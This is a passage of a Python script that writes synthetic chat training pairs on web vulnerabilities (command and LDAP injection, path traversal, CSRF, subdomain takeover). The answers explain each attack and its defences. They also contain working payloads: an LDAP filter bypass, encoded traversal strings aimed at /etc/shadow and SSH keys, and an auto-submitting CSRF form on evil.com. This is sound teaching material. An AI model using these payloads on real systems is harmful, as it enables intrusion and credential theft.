os.system(), subprocess.call(), os.popen(); PHP: exec(), shell_exec(), system(), passthru(), popen(), backtick operator (`cmd`); Java: Runtime.exec(), ProcessBuilder; Node.js: exec(), execSync(), spawn(); Ruby: system(), exec(), backtick. Finding: fuzz all parameters with shell metacharacters; sleep for time-based blind; Burp active scanner; Commix (automated command injection detection and exploitation tool). Defence: avoid shell execution entirely; if needed: parameterise commands (subprocess with list, not string); validate against allowlist (only alphanumeric IPs, no shell chars); run with minimal OS privileges; sandboxing; language-specific safe execution APIs.")

p("How do you test for LDAP injection vulnerabilities?",
  "LDAP injection: attacker manipulates LDAP (Lightweight Directory Access Protocol) queries via unsanitised input; exploits LDAP filter syntax. LDAP filter syntax: (objectClass=user); (uid=john); (&(uid=john)(password=secret)); (|(uid=admin)(uid=root)); special chars: ( ) * \\ NUL 0x00. Basic authentication bypass: login filter: (&(uid=USERNAME)(password=PASSWORD)); inject: USERNAME = *)(uid=*))(|(uid=* and any password; reconstructed filter: (&(uid=*)(uid=*))(|(uid=*)(password=injected)) -- wildcard matches all users = authentication bypass. Wildcard enumeration: if application uses LDAP search and returns results: inject * in username field; if application returns multiple results or different error for valid username: enumerate valid usernames with character-by-character refinement: a*, b*, ...z*; then aa*, ab*, etc. Blind LDAP injection: different responses for valid vs invalid username; enumerate users one character at a time via boolean-based technique (similar to blind SQL injection). LDAP attribute extraction: if output of LDAP search shown: inject additional filter to retrieve other attributes: uid=admin)(objectClass=* returns all attributes of admin object. LDAP injection in other contexts: directory enumeration if injection in search filter; attribute injection if injection in distinguished name (DN) modification; password reset filter injection. Microsoft Active Directory LDAP: same injection principles apply; AD uses LDAP for authentication queries; ADFS authentication can be vulnerable. Testing: inject special chars into login fields: * \ ( ) null; observe error messages or response differences; Burp Suite manual testing; LDAPi (LDAP injection testing tool). Defence: parameterise LDAP queries (use LDAP SDK methods that accept separate filter parameters, not string concatenation); escape special characters in user input before including in filter; allowlist validation (usernames should only be alphanumeric + specific chars); use service accounts with minimal LDAP permissions.")

p("What are path traversal vulnerabilities and how do you find them?",
  "Path traversal (directory traversal): attacker reads files outside the intended directory by manipulating file path parameters. Basic: application loads files: http://target.com/page?file=report.pdf; stored as /var/www/files/report.pdf; inject: ?file=../../../etc/passwd; application reads /var/www/files/../../../etc/passwd = /etc/passwd; if response includes /etc/passwd content: confirmed. Payloads: ../../../etc/passwd (Linux); ..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts (Windows); URL encoding: %2e%2e%2f or %2e%2e/ or ..%2f or ..%5c; double encoding: %252e%252e%252f; path normalisation bypass: ....// or ..../. Interesting files (Linux): /etc/passwd (user list); /etc/shadow (password hashes -- requires root); /proc/self/environ (process environment -- may contain secrets); /proc/self/cmdline (command that launched process); /etc/hosts; /var/log/apache2/access.log or /var/log/nginx/access.log; application config files; SSH keys (~/.ssh/id_rsa, /root/.ssh/id_rsa); /etc/ssh/sshd_config; web application source code and config. Windows targets: C:\\Windows\\System32\\drivers\\etc\\hosts; C:\\Windows\\win.ini; C:\\Windows\\System32\\config\\SAM (requires admin and offline -- not via web traversal typically); web application config files; IIS: C:\\inetpub\\wwwroot\\web.config. Finding path traversal: fuzz all parameters that appear to reference files or paths; try various depth combinations (../../ vs ../../../); test with known file (/etc/hostname on Linux for simple confirmation); Burp active scanner; DotDotPwn (path traversal fuzzer with many bypass variants). Absolute path injection: if application accepts absolute paths: ?file=/etc/passwd (no traversal needed); some frameworks block relative traversal but allow absolute paths. Defence: resolve canonical path and verify it starts with expected directory: realpath() in PHP; Path.normalize() in Java; os.path.abspath() in Python; compare resolved path against allowed base; use allowlist of permitted filenames; store files by UUID not user-supplied name.")

p("Explain cross-site request forgery (CSRF) vulnerabilities.",
  "CSRF (Cross-Site Request Forgery): attacker tricks victim into submitting authenticated request to another site; victim's browser automatically includes session cookies; server processes request believing it came from legitimate user. Classic attack: victim logged into bank.com; attacker's evil.com has hidden form: <form action=https://bank.com/transfer method=POST><input name=to value=attacker_account><input name=amount value=10000></form><script>document.forms[0].submit()</script>; victim visits evil.com; browser auto-submits form to bank.com with victim's session cookie; transfer executed. Requirements: victim must be authenticated to target site; request must have side effects (state-changing); site must not use CSRF protection; typically only affects state-changing requests (GET requests should have no side effects per REST conventions -- but non-standard apps use GET for state changes). SameSite cookie bypass: SameSite=Lax: cookie sent for top-level navigation (link clicks) but not subrequests; GET-based CSRF via link still possible for Lax cookies; method override (PUT/DELETE via POST with _method parameter) may bypass Lax protections; GET-based CSRF for apps that perform state-change via GET. CSRF token bypass: weak CSRF token: static per-user token (reuse across sessions); predictable token (timestamp-based); token not validated (removed from request -- does server still accept?); token validated for existence but not value (any value works); CSRF token in cookie: double-submit cookie pattern bypass if attacker can set cookie (CRLF injection, subdomain cookie injection). Referer validation bypass: some implementations check Referer header; bypass: victim is on page where Referer is not sent (meta referrer policy no-referrer); victim page uses Referrer-Policy: no-referrer header; Referer check only validates origin not full URL (https://attacker.com/bank.com/ passes domain.startsWith check). Defence: CSRF tokens (synchroniser token pattern -- random token per session or per-request stored server-side and validated on state-changing requests); SameSite=Lax/Strict cookies (modern protection; built into browser); check Origin/Referer headers; require non-standard request headers (X-Requested-With: XMLHttpRequest -- added by JS but not HTML forms; CORS blocks reading response but cannot prevent sending with custom headers from non-browser code).")

p("What is subdomain takeover and how do you test for it?",
  "Subdomain takeover: attacker claims abandoned cloud service that a company's DNS still points to; responses from that service appear as if they came from the company's subdomain. How it works: company sets up dev.company.com CNAME to some-project.azurewebsites.net; project decommissioned; azurewebsites.net resource deleted; DNS record not removed; anyone can register same name on azurewebsites.net; attacker registers some-project.azurewebsites.net; dev.company.com now serves attacker content. Impact: phishing (attacker serves fake login page at dev.company.com -- subdomain appears legitimate); bypass CSP (dev.company.com is in whitelist; serve malicious script from there; load on main site); cookie theft (set cookie for .company.com from subdomain; cookie sent to main site); CORS bypass (if main site trusts *.company.com origin). Detection: discover all DNS records (subfinder, amass, dnsx); for each subdomain with CNAME: check if CNAME target exists; check HTTP response for takeover signature; can-i-take-over-xyz GitHub project lists service-specific signatures (GitHub Pages: There isn't a GitHub Pages site here; Heroku: No such app; Azure: 404 Web Site not found; AWS S3: NoSuchBucket). Tools: subjack (scan for takeovers); Nuclei (templates for subdomain takeover detection); SubOver. Testing: dig subdomain.company.com CNAME (get CNAME target); curl -H Host: subdomain.company.com http://CNAME_TARGET_IP (check if service responds); or just curl https://subdomain.company.com (check response for takeover signature). Common vulnerable services: Heroku, GitHub Pages, Netlify, Vercel, AWS S3, Azure Websites, Fastly, Sendgrid, Statuspage.io, UserVoice, Zendesk, HubSpot, Pantheon, Shopify. Defence: remove DNS records when decommissioning services (automate this in offboarding checklists); regularly audit DNS records; CloudFlare DNS monitoring for CNAME changes; Subdomain monitoring with nuclei in CI/CD.")

existing = sum(1 for _ in OUT.open()) if OUT.exists() else 0
print(f"Existing pairs: {existing}")
print(f"New pairs to add: {len(pairs)}")

with OUT.open("a") as f:
    for q, a in pairs:
        f.write(json.dumps({"messages": [
            {"role": "user", "content": q},
            {"role": "assistant", "content": a}
        ]}) + "\n")

total = sum(1 for _ in OUT.open())
print(f"Total upgrade_f pairs: {total}")
if total >= 1000:
    print("upgrade_f COMPLETE -- 1000+ pairs!")
else:
    print(f"Need {1000-total} more pairs")
